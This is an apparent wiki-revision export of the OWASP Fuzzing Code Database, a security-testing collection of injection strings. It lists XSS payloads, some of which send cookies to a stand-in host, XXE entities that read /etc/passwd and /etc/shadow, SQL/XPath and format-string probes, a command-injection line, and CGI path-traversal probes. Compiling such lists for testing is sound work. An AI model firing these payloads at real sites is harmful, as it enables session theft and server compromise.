&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80084</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80084"/>
				<updated>2010-03-17T21:16:37Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
